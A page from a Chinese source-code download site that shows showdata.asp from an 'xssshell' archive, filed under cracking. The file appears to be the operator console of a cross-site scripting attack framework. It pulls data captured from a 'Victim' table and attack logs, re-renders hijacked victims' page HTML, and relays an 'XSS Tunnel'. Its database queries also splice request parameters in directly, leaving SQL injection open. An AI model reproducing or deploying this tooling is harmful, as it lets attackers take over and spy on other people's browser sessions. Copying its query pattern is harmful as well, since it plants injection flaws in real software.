开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
showdata.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:2k
源码类别:

破解

开发平台:

ASP/ASPX

showdata.asp:源码内容
  1. <%
  2. '// SHOW DATA
  3. ' Show detailed data from records be carefull about backfire XSS attacks!
  5. '//HISTORY
  6. '09/08/2006
  7. ' - Started
  8. '01.04.2007
  9. ' - Log Check replaced with AttackID instead of ID
  12. '//TODO
  13. ' - Safe HTML method (you can manually implement this page to a subpage for a more secure HTML viewing expreience)
  14. ' - Remove previously injected payload  (if any)
  16. %>
  17. <!--#include file="db.asp" -->
  19. <%
  20. protected()
  22. Dim mode
  23. mode = fm_Qnstr("m")
  25. Select Case mode
  26. Case 1
  27. ShowData
  29. Case 2 'XSS Tunnel
  30. ShowHTML 2
  32. Case Else
  33. ShowHTML 1
  35. End Select
  38. Sub ShowData()
  39. Dim RsData
  40. getRs RsData, "SELECT Data FROM Victim WHERE ID = " & fm_Qnstr("i")
  42. Response.Write "<blockquote>" & fm_Encode(RsData("Data")) & "</blockquote>"
  44. fmKill RsData
  47. End Sub
  50. Sub ShowHTML(mode)
  52. Dim RsData
  53. getRs RsData, "SELECT ID, Data, Type, [Time] FROM Log  WHERE AttackID = '" & fm_Qnstr("i") & "'"
  55. If RsData.EOF And RsData.BOF Then
  56. Response.Write "NO_RECORD"
  57. Exit Sub
  58. End If
  61. Select Case mode
  62. Case 1 'Old School
  63. Response.Write "Time : " & RsData("Time") & "<hr>"
  65. Dim Data2Write
  66. Data2Write = RsData("Data")
  68. %>
  70. <script>
  71. window.onload=function(){
  72. var newdoc = filter(unescape("<%=Data2Write%>"));
  74. document.open();
  75. document.write(newdoc);
  76. document.close();
  77. }
  80. /*
  81.  You should;
  82. - implement your own filter here if it's not style otherwise xssshell will call itelf recursively
  83.  You can;
  84. - Build a filter for against backfire (XSS attacks from so called victim - don't forget this page and your patterns will be visible to everyone.)
  85. - or strip all HTML etc...
  87. */
  89. function filter(html){
  90. return html.replace(/<SCRIPTb[^>]*>(.*?)</SCRIPT>/i, "");
  91. }
  92. </script>
  94. <%
  96. Case 2 'XSS Tunnel
  98. If IsNull(RsData("Data"))  Then
  99. Response.Write "NO_RECORD"
  100. Exit Sub
  101. End If 
  103. Dim data 
  104. data  = RsData("Data")
  105. ' data  = Replace(data, "xssshell.asp","none.htm")
  107. Response.Write fm_Encode(data)
  109. End Select
  112. fmKill RsData
  113. End Sub
  114. %>